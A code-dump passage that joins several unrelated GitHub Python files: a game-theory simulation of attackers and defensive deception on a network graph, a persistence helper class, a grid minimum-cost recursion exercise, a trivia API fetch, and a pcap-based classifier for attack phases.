graph_function.adjacent_node(G_att, attacker_locaton)\n\n for node_id in attacker_adjacent:\n if G_real.has_node(node_id):\n length = len(G_real.nodes[node_id][\"encryption vulnerability\"])\n for index in range(length):\n G_real.nodes[node_id][\"encryption vulnerability\"][index] = min(\n G_real.nodes[node_id][\"encryption vulnerability\"][index] *\n 1.1, 10)\n G_att.nodes[node_id][\"encryption vulnerability\"][index] = min(\n G_att.nodes[node_id][\"encryption vulnerability\"][index] *\n 1.1, 10)\n G_def.nodes[node_id][\"encryption vulnerability\"][index] = min(\n G_def.nodes[node_id][\"encryption vulnerability\"][index] *\n 1.1, 10)\n\n # update nodes attribute\n graph_function.update_vul(G_real)\n graph_function.update_vul(G_att)\n graph_function.update_vul(G_def)\n\n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n return attack_result\n\n # decide which node to compromise\n max_APV_id = None\n max_APV = 0\n for n in attacker_adjacent:\n if calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob) >= max_APV:\n max_APV_id = n\n max_APV = calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob)\n\n if max_APV_id is None:\n if display:\n print(\"no legitimate neighbor node \\U0001F630\")\n return attack_result\n\n # collusive attack\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n attack_result[\"ids\"].append(max_APV_id)\n if display: print(\"AS6: collusive attack\")\n return attack_result\n\n # try compromising\n for index in range(len(G_att.nodes[n][\"encryption vulnerability\"])):\n if random.uniform(\n 0, 10\n ) <= G_real.nodes[max_APV_id][\"encryption vulnerability\"][index]:\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n# G_def.nodes[max_APV_id][\"compromised_status\"] = True\n attack_result[\"ids\"].append(max_APV_id)\n break\n\n return attack_result\n\n\n# In[48]:\n\n\n# AS8 – Data exfiltration\ndef attack_AS_8(G_real, G_att, G_def, compromised_nodes, attacker_locaton,\n P_fake, attack_detect_prob):\n\n if random.random() < attack_detect_prob:\n attacked_adjacent = graph_function.adjacent_node(G_real, attacker_locaton)\n else:\n attacked_adjacent = graph_function.adjacent_node(G_att, attacker_locaton)\n\n attack_cost = 3\n attack_result = {\n \"attack_cost\": attack_cost,\n \"ids\": [],\n \"data_exfiltrated\": False\n }\n\n # decide which node to compromise\n max_APV_id = None\n max_APV = 0\n for n in attacked_adjacent:\n if calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob) >= max_APV:\n max_APV_id = n\n max_APV = calc_APV(G_att, G_real, n, attack_cost,\n attack_detect_prob)\n\n if max_APV_id is None:\n if display:\n print(\"no legitimate neighbor node \\U0001F630\")\n return attack_result\n\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n # collusive attack\n attack_result[\"ids\"].append(max_APV_id)\n else:\n if random.random() <= G_real.nodes[max_APV_id][\"normalized_vulnerability\"]:\n # compromise attempt\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n# G_def.nodes[max_APV_id][\"compromised_status\"] = True\n attack_result[\"ids\"].append(max_APV_id)\n \n \n\n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n else:\n compromised_nodes.append(max_APV_id)\n\n # data exfiltration\n Thres_c = 30*5 #30 # pre-set value\n total_compromised_importance = 0\n for node_id in compromised_nodes:\n if G_real.has_node(node_id):\n if G_real.nodes[node_id][\"compromised_status\"]:\n total_compromised_importance += G_real.nodes[node_id][\n \"importance\"]\n\n if total_compromised_importance > Thres_c:\n if display: print(\"Data exfiltration success\")\n if display:\n print(\"total collected importance is\",\n total_compromised_importance)\n attack_result[\"data_exfiltrated\"] = True\n else:\n if display: print(\"Data exfiltration failed\")\n attack_result[\"data_exfiltrated\"] = False\n\n return attack_result\n\n\n# In[49]:\n\n\n# below is for class\n\n\n# In[50]:\n\n\ndef attacker_class_choose_strategy(self, def_strategy_number,\n defend_cost_record, defend_impact_record):\n\n # attacker is 100% sure of CKC subgame\n P_subgame = np.zeros(self.CKC_number + 1)\n P_subgame[self.CKC_position] = 1\n\n S_j = np.zeros(self.strategy_number)\n for j in range(self.strategy_number):\n for k in range(self.CKC_number + 1):\n S_j[j] += P_subgame[k] * self.prob_believe_opponent[k][j]\n\n if display: print(f\"S_j in att is {S_j}\")\n\n # eq. 19 (Uncertainty g)\n g = self.uncertainty\n \n # eq. 17\n utility = np.zeros((self.strategy_number, def_strategy_number))\n for i in range(self.strategy_number):\n for j in range(def_strategy_number):\n utility[i,\n j] = (self.impact_record[i] +\n defend_cost_record[j] / 3) - (\n self.strat_cost[i] / 3 + defend_impact_record[j])\n \n # normalization range\n a = 1\n b = 10\n \n # eq. 8\n EU_C = np.zeros(self.strategy_number)\n for i in range(self.strategy_number):\n for j in range(def_strategy_number):\n EU_C[i] += S_j[j] * utility[i, j]\n # Normalization\n if (max(EU_C)-min(EU_C)) != 0:\n EU_C = a + (EU_C-min(EU_C))*(b-a)/(max(EU_C)-min(EU_C))\n self.EU_C = EU_C\n\n \n # eq. 9\n EU_CMS = np.zeros(self.strategy_number)\n for i in range(self.strategy_number):\n w = np.argmin(utility[i]) # min utility index\n EU_CMS[i] = self.strategy_number * S_j[w] * utility[i][w]\n # Normalization\n if (max(EU_CMS)-min(EU_CMS)) != 0:\n EU_CMS = a + (EU_CMS- min(EU_CMS))*(b-a)/(max(EU_CMS)-min(EU_CMS))\n self.EU_CMS = EU_CMS\n \n # eq. 7\n# HEU = np.zeros(self.strategy_number)\n# for index in range(self.strategy_number):\n# HEU[index] = ((1 - g) * EU_C[index]) + (g * EU_CMS[index])\n# \n if random.random() > g:\n HEU = EU_C\n self.HEU = HEU # uncertainty case doesn't consider as real HEU\n else:\n HEU = np.ones(self.strategy_number)\n\n self.AHEU = HEU\n\n # eq. 23\n AHEU = np.zeros(self.strategy_number)\n for index in range(self.strategy_number):\n AHEU[index] = HEU[index] * self.strat_option[\n self.CKC_position, index] # for Table 4\n\n\n \n self.chosen_strategy = random.choices(range(self.strategy_number),\n weights=AHEU,\n k=1)[0]\n return self.chosen_strategy\n\n\n# In[51]:\n\n\ndef attacker_class_execute_strategy(self, G_real, G_def, P_fake,\n attack_detect_prob):\n return_value = False\n attack_result = {\"attack_cost\": 0, \"ids\": []}\n\n if self.chosen_strategy == 0:\n\n attack_result = attack_AS_1(G_real, self.network, G_def,\n self.collection_list, self.monit_time)\n return_value = True\n elif self.chosen_strategy == 1:\n attack_result = attack_AS_2(self.collection_list, G_real, self.network,\n G_def, P_fake, attack_detect_prob, self.location)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n\n # decrease collection list\n if self.location is None:\n self.collection_list.remove(attack_result[\"ids\"][0])\n\n return_value = True\n else:\n if display: print(\"attack 2 failed\")\n\n elif self.chosen_strategy == 2:\n attack_result = attack_AS_3(self.collection_list, G_real, self.network, G_def, P_fake,\n attack_detect_prob)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n return_value = True\n else:\n if display: print(\"attack 3 failed\")\n\n elif self.chosen_strategy == 3:\n attack_result = attack_AS_4(G_real, self.network, G_def,\n attack_detect_prob, P_fake, self.location)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n return_value = True\n else:\n if display: print(\"attack 4 failed\")\n\n elif self.chosen_strategy == 4:\n attack_result = attack_AS_5(G_real, self.network, G_def, self.location,\n attack_detect_prob)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n return_value = True\n else:\n if display: print(\"attack 5 failed\")\n\n elif self.chosen_strategy == 5:\n attack_result = attack_AS_6(G_real, self.network, G_def, self.location,\n P_fake, attack_detect_prob)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n return_value = True\n else:\n if display: print(\"attack 6 failed\")\n\n elif self.chosen_strategy == 6:\n attack_result = attack_AS_7(G_real, self.network, G_def, self.location,\n P_fake, attack_detect_prob)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n return_value = True\n else:\n if display: print(\"attack 7 failed\")\n\n else:\n attack_result = attack_AS_8(G_real, self.network, G_def,\n self.compromised_nodes, self.location,\n P_fake, attack_detect_prob)\n if attack_result[\"ids\"]:\n self.compromised_nodes.extend(attack_result[\"ids\"])\n# return_value = True\n\n if attack_result[\"data_exfiltrated\"]:\n if display: print(\"attacker exfiltrate data\")\n return_value = True\n else:\n if display: print(\"attack 8 failed\")\n\n self.impact_record[self.chosen_strategy] = attack_impact(\n G_real, attack_result[\"ids\"])\n \n if attack_result[\"ids\"]:\n self.location = random.choice(attack_result[\"ids\"])\n \n\n\n return return_value\n\n\n# In[53]:\n\n\nclass attacker_class:\n def __init__(self, game, uncertain_scheme, att_detect_UpBod):\n if display: print(\"create attacker\")\n self.network = copy.deepcopy(game.graph.network) # attacker's view\n self.strategy_number = 8\n self.collection_list = []\n self.location = None\n self.impact_record = np.ones(\n self.strategy_number\n ) # attacker believe all strategy have impact initially\n self.strat_cost = att_strategy_cost(self.strategy_number)\n self.strat_option = att_strategy_option_matrix(\n game.CKC_number, self.strategy_number) # Table 4\n self.belief_context = [1 /\n (game.CKC_number + 1)] * (game.CKC_number + 1)\n self.CKC_position = 0\n self.CKC_number = game.CKC_number\n self.prob_believe_opponent = np.zeros(\n (game.CKC_number + 1,\n 8)) # 8 is defender strategy number # c_{\\kappa}\n self.obs_oppo_strat_history = np.zeros(\n (game.CKC_number + 1, 8)) # 8 is defender strategy number\n self.in_system_time = 1\n self.monit_time = 1\n self.detect_prob = random.uniform(0, att_detect_UpBod)\n self.chosen_strategy = 0\n self.in_honeynet = False\n self.uncertain_scheme = uncertain_scheme\n if self.uncertain_scheme:\n self.uncertainty = 1 #1 # 100% uncertainty at beginning (scheme change here!)\n else:\n self.uncertainty = 0\n self.HEU = np.zeros(self.strategy_number)\n self.compromised_nodes = []\n self.EU_C = None\n self.EU_CMS = None\n self.AHEU = np.zeros(self.strategy_number)\n self.att_guess_DHEU = np.zeros(self.strategy_number)\n self.chosen_strategy_record = np.zeros(self.strategy_number)\n self.defender_observation = np.zeros(self.strategy_number)\n self.att_guess_def_impact = np.ones(self.strategy_number)\n self.observed_defen_strat = 0\n self.defender_strat_cost = def_strategy_cost(self.strategy_number)\n\n choose_strategy = attacker_class_choose_strategy\n\n execute_strategy = attacker_class_execute_strategy\n\n def reset_in_system_time(self):\n self.in_system_time = 1\n return self.in_system_time\n\n def next_stage(self):\n if self.CKC_position != 5:\n self.CKC_position += 1\n\n def reset_attribute(self):\n pass\n\n def observe_opponent(self, defend_CKC, defen_strategy):\n # Observe strategy\n self.obs_oppo_strat_history[defend_CKC, defen_strategy] += 1\n self.observed_defen_strat = defen_strategy\n self.prob_believe_opponent = update_strategy_probability(\n self.obs_oppo_strat_history)\n\n def update_attribute(self, dec, _lambda):\n # monitor time\n self.monit_time += 1\n \n # if in_system\n if self.CKC_position >= 2:\n self.in_system_time += 1\n\n # belief context\n self.belief_context[0] = 1 - sum(self.belief_context[1:])\n\n # in honeypot\n if self.location is not None:\n if self.network.nodes[self.location][\"type\"] == 3:\n self.in_honeynet = True\n else:\n self.in_honeynet = False\n\n # uncertainty\n self.uncertainty = attacker_uncertainty_update(self.in_system_time,\n self.detect_prob, dec,\n self.uncertain_scheme, _lambda)\n # HNE Hitting Ratio\n self.defender_observation[self.chosen_strategy] += 1\n self.att_guess_DHEU = self.att_guess_def_EU_C()\n\n def att_guess_def_EU_C(self):\n # attacker observe itself\n self.chosen_strategy_record[self.chosen_strategy] += 1\n\n if np.sum(self.defender_observation) == 0:\n strat_prob = np.zeros(self.strategy_number)\n else:\n strat_prob = self.chosen_strategy_record / np.sum(self.chosen_strategy_record)\n xi = 5\n\n self.att_guess_def_impact[self.observed_defen_strat] = 1 - self.impact_record[self.chosen_strategy]\n\n utility = np.zeros((self.strategy_number, self.strategy_number))\n for i in range(self.strategy_number):\n for j in range(self.strategy_number):\n utility[i, j] = (self.att_guess_def_impact[i] +\n self.strat_cost[j] / 3) - (self.defender_strat_cost[i] / 3 + self.impact_record[j])\n EU_C = np.zeros(self.strategy_number)\n for i in range(self.strategy_number):\n for j in range(self.strategy_number):\n EU_C[i] += strat_prob[j] * utility[i, j]\n # Normalization\n a = 1\n b = 10\n if (max(EU_C) - min(EU_C)) != 0:\n EU_C = a + (EU_C - min(EU_C)) * (b - a) / (max(EU_C) - min(EU_C))\n self.EU_C = EU_C\n return EU_C\n\n\n def random_moving(self):\n if self.location is None:\n return\n\n neighbor_list = [i for i in self.network[self.location]]\n compromised_neighbor_list = [self.location\n ] # allow attacker stands still\n for index in neighbor_list:\n if self.network.nodes[index][\"compromised_status\"]:\n compromised_neighbor_list.append(index)\n\n self.location = random.choice(compromised_neighbor_list)\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Wan-ZL/ARO-Foureye","sub_path":"Foureye 1 - Defensive Deception Against Advanced Persistent Threats via Hypergame Theory/PycharmProject/attacker_function.py","file_name":"attacker_function.py","file_ext":"py","file_size_in_byte":32292,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"31257462444","text":"#!/usr/bin/env python3\nimport tempfile\nimport re\n\nimport apsw as lite\nimport os as os\nimport numpy as np\nimport pandas as pd\nimport bcolz as bcz\n\n\n# Suppress the warning until the next wersion\nimport blaze as blz\n\nfrom .Config import cf\nfrom apsw import ConstraintError\n\n\nclass Freezable(object):\n\n '''\n Freezable is an abstract class. Things that inherit from Freezable can\n\tbe loaded and unloaded from the Minus80.\n\n\tA freezable object is a persistant object that lives in a known directory\n aimed to make expensive to build objects and databases loadable from \n new runtimes.\n \n The three main things that a Freezable object supplies are:\n - access to a sqlite database (relational records)\n - access to a bcolz databsase (columnar data)\n - access to a key/val store\n - access to named temp files\n\n '''\n\n def __init__(self, name, type=None, basedir=None):\n # Set up our base directory\n if basedir == None:\n self._m80_basedir = cf.options.basedir\n self._m80_name = name\n # \n if type == None:\n # Just use the class type as the type\n self._m80_type = re.match(\n \"\",\n str(self.__class__)\n ).groups()[0]\n # A dataset already exists, return it\n self._db = self._open_db(self._m80_name)\n\n try:\n cur = self._db.cursor()\n cur.execute('''\n CREATE TABLE IF NOT EXISTS globals (\n key TEXT,\n val TEXT,\n type TEXT\n );\n CREATE UNIQUE INDEX IF NOT EXISTS uniqkey ON globals(key)\n ''')\n except TypeError:\n raise TypeError('{}.{} does not exist'.format(type, name))\n\n def _open_db(self, dbname, type=None):\n '''\n This is the access point to the sqlite database\n '''\n # This lets us grab databases for other types\n if type is None:\n type = self._m80_type\n # return a connection if exists\n return lite.Connection(\n os.path.expanduser(\n os.path.join(\n self._m80_basedir,\n 'databases',\n \"{}.{}.db\".format(type, dbname)\n )\n )\n )\n\n def _bcolz(self, tblname, dbname=None, type=None, df=None, blaze=False):\n '''\n This is the access point to the bcolz database\n '''\n if type is None:\n type = self._m80_type\n if dbname is None:\n dbname = self._m80_name\n if df is None:\n # return the dataframe if it exists \n try:\n df = bcz.open(\n os.path.expanduser(\n os.path.join(\n cf.options.basedir,\n 'databases',\n \"{}.{}.{}\".format(type, dbname, tblname)\n )\n )\n )\n except IOError:\n return None\n else:\n if len(df) == 0:\n df = pd.DataFrame()\n if blaze:\n df = blz.data(df)\n else:\n if blaze:\n df = blz.data(df)\n else:\n df = df.todataframe()\n if not blaze and 'idx' in df.columns.values:\n df.set_index('idx', drop=True, inplace=True)\n df.index.name = None\n return df\n \n else:\n if not(df.index.dtype_str == 'int64') and not(df.empty):\n df = df.copy()\n df['idx'] = df.index\n if isinstance(df,pd.DataFrame):\n path = os.path.expanduser(\n os.path.join(\n cf.options.basedir,\n 'databases',\n \"{}.{}.{}\".format(type, dbname, tblname)\n )\n )\n if df.empty:\n bcz.fromiter((),dtype=np.int32,mode='w',count=0,rootdir=path)\n else:\n bcz.ctable.fromdataframe(df,mode='w',rootdir=path)\n \n if 'idx' in df.columns.values:\n del df\n return\n \n def _tmpfile(self):\n # returns a handle to a tmp file\n return tempfile.NamedTemporaryFile(\n dir=os.path.expanduser(\n os.path.join(\n cf.options.basedir,\n \"tmp\"\n ) \n )\n )\n\n def _dict(self, key, val=None):\n '''\n Stores global variables for the freezable object\n '''\n try:\n if val is not None:\n val_type = type(val)\n val = str(val)\n if val_type not in ('int','float','str'):\n raise TypeError(\n 'val must be in [int,float,str], not {}'.format(val_type)\n )\n self._db.cursor().execute('''\n INSERT OR REPLACE INTO globals\n (key, val, type)VALUES (?, ?, ?)''', (key, val, type)\n )\n else:\n return self._db.cursor().execute(\n '''SELECT val FROM globals WHERE key = ?''', (key, )\n ).fetchone()[0]\n except TypeError:\n raise ValueError('{} not in database'.format(key))\n","repo_name":"schae234/Minus80","sub_path":"minus80/Freezable.py","file_name":"Freezable.py","file_ext":"py","file_size_in_byte":5577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27459795701","text":"\"\"\"\nDivide and Conquer:\n403 - Minimum cost to reach the last cell\n\n- 2D matrix is given \n- Each cell has a cost associated with it for accessing\n- We need to start from (0, 0) cell and go till (n-1, n-1) cell\n- We can go only to right or down cell from current cell\n- Find the way in which the cost is minimum \n\n1. Problem\n2. Input: 2D list\n3. Output: int\n4. Edge case \n5. Time complexity\n6. Space complexity \n\"\"\"\n\nfrom typing import List \nimport math \n\ndef getMinCostBackward(matrix: List[List[int]], r: int, c: int) -> int:\n\n if r <= -1 or c <= -1:\n return math.inf\n if r == 0 and c == 0:\n return matrix[r][c]\n\n a = matrix[r][c] + getMinCostBackward(matrix, r - 1, c)\n b = matrix[r][c] + getMinCostBackward(matrix, r, c - 1)\n\n return min(a, b)\n\n\n\ndef getMinCostForward(matrix: List[List[int]], r: int, c: int) -> int:\n if r >= len(matrix) or c >= len(matrix[0]):\n return math.inf\n if r == len(matrix) - 1 and c == len(matrix[0]) - 1:\n return matrix[r][c]\n\n a = matrix[r][c] + getMinCostForward(matrix, r, c + 1)\n b = matrix[r][c] + getMinCostForward(matrix, r + 1, c)\n return min(a, b)\n\n\nmatrix = [[4, 7, 8, 6, 4], \n [6, 7, 3, 9, 2], \n [3, 8, 1, 2, 4], \n [7, 1, 7, 3, 7], \n [2, 9, 8, 9, 3]] # expect 36\n\nprint(getMinCostBackward(matrix, 4, 4))\nprint(getMinCostForward(matrix, 0, 0))\n\n","repo_name":"chen-qian-dan/Algorithms_And_Data_Structures_20211227Mon","sub_path":"14-Divide_and_Conquer/403_MinCostToReachTheLastCell.py","file_name":"403_MinCostToReachTheLastCell.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33286284551","text":"# 1\n# 5 4\n# 01000\n# 00110\n# 10001\n# 01001\n\ntest = int(input())\n\nfor t in range(test):\n m, n = map(int, input().split())\n arr = list([0] * m for _ in range(n))\n for i in range(n):\n row = input()\n for j in range(m):\n if int(row[j]) == 1:\n arr[i][j] = int(row[j])\n \n \n","repo_name":"chulhee23/today_ps","sub_path":"elice/sds/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"38193509084","text":"import requests\nimport json\nparameters = {\n \"type\": \"boolean\"\n}\nquestion_data = requests.get(\"https://opentdb.com/api.php?amount=20&category=31&type=boolean\", params=parameters)\ndata = question_data.json()\nquiz_questions = data['results']\n\n\n","repo_name":"Osireg17/Anime-Quiz-App","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8910053306","text":"# from numpy import array\n# from keras.utils import plot_model\nimport sys\nimport argparse\nimport pyshark\nimport numpy as np\nimport pandas as pd\nfrom keras.models import load_model\nfrom sklearn.preprocessing import OneHotEncoder\n\nnp.seterr(divide='ignore',invalid='ignore')\n\ndef analyse_ip(packet):\n # src_ip = str(packet.ip.src)\n number = str(packet.number) #frame no.\n src_ip_comm = str(packet.ip.src)\n src_ip_comm_split = src_ip_comm.split(\".\")\n # 点进制转化为十进制ip\n src_ip = str(int(src_ip_comm_split[0]) * 256 ** 3 +\n int(src_ip_comm_split[1]) * 256 ** 2 +\n int(src_ip_comm_split[2]) * 256 +\n int(src_ip_comm_split[3]))\n # dst_ip = str(packet.ip.dst)\n dst_ip_comm = str(packet.ip.dst)\n dst_ip_comm_split = dst_ip_comm.split(\".\") #???\n dst_ip = str(int(dst_ip_comm_split[0]) * 256 ** 3 +\n int(dst_ip_comm_split[1]) * 256 ** 2 +\n int(dst_ip_comm_split[2]) * 256 +\n int(dst_ip_comm_split[3]))\n proto = str(packet.ip.proto)\n ip_hdr_len = str(packet.ip.hdr_len)\n ip_pkt_len = str(packet.ip.len)\n ip_checksum_status = str(packet.ip.checksum_status)\n ip_ttl = str(packet.ip.ttl)\n ip_highest_layer = str(packet.highest_layer)\n return [number, src_ip, dst_ip, proto, ip_pkt_len, ip_checksum_status, ip_ttl]\n\n\ndef analyse_icmp(packet):\n '''\n only Layer ETH + IP + ICMP\n :param packet: packet in pcap\n :return: list of field\n '''\n icmp_type_code = str(packet.icmp.type) + str(packet.icmp.code)\n icmp_checksum_status = str(packet.icmp.checksum_status)\n icmp_data_len = str(packet.icmp.data_len)\n return [\"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\",\n icmp_type_code, icmp_checksum_status]\n\n\ndef analyse_arp(packet):\n arp_src_proto_ipv4 = str(packet.arp.src_proto_ipv4)\n arp_dst_proto_ipv4 = str(packet.arp.dst_proto_ipv4)\n arp_opcode = str(packet.arp.opcode)\n\n\ndef analyse_tcp(packet):\n try:\n stream_index = str(packet.tcp.stream)\n except:\n stream_index = \"\"\n src_port = str(packet.tcp.srcport)\n dst_port = str(packet.tcp.dstport)\n tcp_hdr_len = str(packet.tcp.hdr_len)\n tcp_pkt_len = str(packet.tcp.len)\n tcp_timestamp = str(packet.tcp.time_relative)\n tcp_time_delta = str(packet.tcp.time_delta)\n tcp_flags = str(packet.tcp.flags)\n tcp_flags_ack = str(packet.tcp.flags_ack)\n tcp_flags_syn = str(packet.tcp.flags_syn)\n tcp_flags_fin = str(packet.tcp.flags_fin)\n tcp_flags_urg = str(packet.tcp.flags_urg)\n tcp_ack = str(packet.tcp.ack)\n tcp_checksum_status = str(packet.tcp.checksum_status)\n tcp_payload = codecs.decode(packet.tcp.payload.replace(\":\", \"\"), \"hex\").decode('utf-8')\n return [stream_index, src_port, dst_port, tcp_timestamp, tcp_time_delta,\n tcp_flags, tcp_flags_ack, tcp_flags_syn, tcp_flags_fin, tcp_flags_urg,\n tcp_checksum_status, \"\", \"\"]\n\n\ndef analyse_udp(packet):\n try:\n stream_index = str(packet.udp.stream)\n except:\n stream_index = \"\"\n src_port = str(packet.udp.srcport)\n dst_port = str(packet.udp.dstport)\n # udp_hdr_len = str(packet.udp.hdr_len)\n udp_pkt_len = str(packet.udp.length)\n udp_timestamp = str(packet.udp.time_relative)\n udp_time_delta = str(packet.udp.time_delta)\n udp_flags = \"\"\n udp_checksum_status = str(packet.udp.checksum_status)\n return [stream_index, src_port, dst_port, udp_timestamp, udp_time_delta,\n udp_flags, \"\", \"\", \"\", \"\", udp_checksum_status, \"\", \"\"]\n\n\ndef pcap2df(in_file):\n i = 0\n cap = pyshark.FileCapture(in_file)\n df = pd.DataFrame(columns=(\"\",\"number\", \"src_ip\", \"dst_ip\", \"proto\", \"ip_pkt_len\",\n \"ip_checksum_status\", \"ip_ttl\", \n \"stream_index\", \"src_port\", \"dst_port\", \"timestamp\",\n \"time_delta\", \"flags\", \"tcp_flags_ack\", \"tcp_flags_syn\",\n \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\",\n \"icmp_type_code\", \"icmp_checksum_status\"))\n for pkt in cap:\n try:\n if \"TCP\" in pkt.transport_layer:\n pkt_out_list = [i] + analyse_ip(pkt) + analyse_tcp(pkt)\n pkt_out_df = pd.Series(pkt_out_list).replace(r'', np.nan, regex=True)\n pkt_out_df.index = [\"\", \"number\", \"src_ip\", \"dst_ip\", \"proto\", \"ip_pkt_len\",\n \"ip_checksum_status\", \"ip_ttl\",\n \"stream_index\", \"src_port\", \"dst_port\", \"timestamp\",\n \"time_delta\", \"flags\", \"tcp_flags_ack\", \"tcp_flags_syn\",\n \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\",\n \"icmp_type_code\", \"icmp_checksum_status\"]\n df = df.append(pkt_out_df, ignore_index=True)\n elif \"UDP\" in pkt.transport_layer:\n pkt_out_list = [i] + analyse_ip(pkt) + analyse_udp(pkt)\n pkt_out_df = pd.Series(pkt_out_list).replace(r'', np.nan, regex=True)\n pkt_out_df.index = [\"\", \"number\", \"src_ip\", \"dst_ip\", \"proto\", \"ip_pkt_len\",\n \"ip_checksum_status\", \"ip_ttl\",\n \"stream_index\", \"src_port\", \"dst_port\", \"timestamp\",\n \"time_delta\", \"flags\", \"tcp_flags_ack\", \"tcp_flags_syn\",\n \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\",\n \"icmp_type_code\", \"icmp_checksum_status\"]\n df = df.append(pkt_out_df, ignore_index=True)\n elif \"ICMP\" in pkt.ip_highest_layer:\n pkt_out_list = [i] + analyse_ip(pkt) + analyse_icmp(pkt)\n pkt_out_df = pd.Series(pkt_out_list).replace(r'', np.nan, regex=True)\n pkt_out_df.index = [\"\", \"number\", \"src_ip\", \"dst_ip\", \"proto\", \"ip_pkt_len\",\n \"ip_checksum_status\", \"ip_ttl\",\n \"stream_index\", \"src_port\", \"dst_port\", \"timestamp\",\n \"time_delta\", \"flags\", \"tcp_flags_ack\", \"tcp_flags_syn\",\n \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\",\n \"icmp_type_code\", \"icmp_checksum_status\"]\n df = df.append(pkt_out_df, ignore_index=True)\n except AttributeError as e:\n # ignore packets that aren't IPv4\n pass\n except Exception as e:\n print(\"No TCP or UDP or ICMP Found\")\n return df\n\ndef csv2vec(df):\n '''\n 读取数据,并采用LabelEncoder+OneHotEncoder编码等方式向量化\n :return: X-数据集\n '''\n x_len_time = df[[\"ip_pkt_len\", \"timestamp\", \"time_delta\", \"src_port\", \"dst_port\", \"ip_ttl\", \"stream_index\"]]\n # 数据标准化\n x_len_time = (x_len_time - x_len_time.min()) / (x_len_time.max() - x_len_time.min())\n # 使用LabelEncoder+OneHotEncoder\n X = np.concatenate([enc.transform(df[[\"proto\", \"ip_checksum_status\", \"tcp_flags_ack\", \"tcp_flags_syn\", \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\", \"icmp_type_code\", \"icmp_checksum_status\"]]),\n x_len_time], axis=1)\n return X\n\ndef create_dataset(dataset_X, dataset_Y, look_back=1):\n dataX, dataY = [], []\n for i in range(len(dataset_X) - look_back + 1):\n a = dataset_X[i:(i + look_back), :]\n dataX.append(a)\n dataY.append(dataset_Y[i, :])\n return np.array(dataX, np.float16), np.array(dataY, np.float16)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Attack Phase Judgement\")\n parser.add_argument('-i', '--ip')\n parser.add_argument('-p', '--pcap')\n args = parser.parse_args()\n\n # 判定ip并转成同形式\n test_ip = str(args.ip)\n test_ip_split = test_ip.split(\".\")\n process_ip = float(int(test_ip_split[0]) * 256 ** 3 +\n int(test_ip_split[1]) * 256 ** 2 +\n int(test_ip_split[2]) * 256 +\n int(test_ip_split[3]))\n seq_len = 30\n rootPath = \".\\\\\"\n labelList = [\"label0\", \"label1\", \"label2\", \"label3\", \"label4\", \"label5\", \"label6\"]\n # 加载训练数据生成enc\n df = pd.DataFrame(pd.read_csv(rootPath + \"darpa-trainset.csv\")).fillna(0)\n enc = OneHotEncoder(sparse=False).fit(df[[\"proto\", \"ip_checksum_status\", \"tcp_flags_ack\", \"tcp_flags_syn\", \"tcp_flags_fin\", \"tcp_flags_urg\", \"tcp_checksum_status\", \"icmp_type_code\", \"icmp_checksum_status\"]])\n\n # 加载测试数据\n testFile = args.pcap\n # testdata = pd.read_table(testFile, header=0, sep=',')\n testdata = pcap2df(testFile)\n # 强转dataframe中的数据类型\n testdata = pd.DataFrame(testdata, dtype=np.float)\n # testdf = pd.DataFrame(testdata).fillna(0)\n testdf = testdata.fillna(0)\n testdf_ip = testdf[(testdf['src_ip'] == process_ip) | (testdf['dst_ip'] == process_ip)]\n testX = csv2vec(testdf_ip)\n outMax = 0\n # 一个文件进模型通过每个模型进行预测分类,选出最接近准确的一个阶段\n for i in range(len(labelList)):\n labelNum = labelList[i]\n # encY = OneHotEncoder(sparse=False).fit(testdf[[labelNum]])\n # 加载模型\n model = load_model(rootPath + 'model_1021\\\\' + str(i) + '.h5')\n # testY = encY.transform(testdf[labelNum].values.reshape(-1, 1))\n # test_X, test_Y = create_dataset(testX, testY, seq_len)\n test_X, test_Y = create_dataset(testX, testX, seq_len)\n y_pred = model.predict(test_X)#使用predict()方法进行预测时,返回值是数值,表示样本属于每一个类别的概率\n out = np.mean(y_pred, 0)# 求每一列的均值\n # out = out[~np.isnan(out)]\n print('The ' + str(i) + 'th y_pred:' + str(out))\n # 排序选最大预测值\n if out[0] > outMax:\n outMax = out[0]\n stage = i\n print('The stage of this data is: ' + 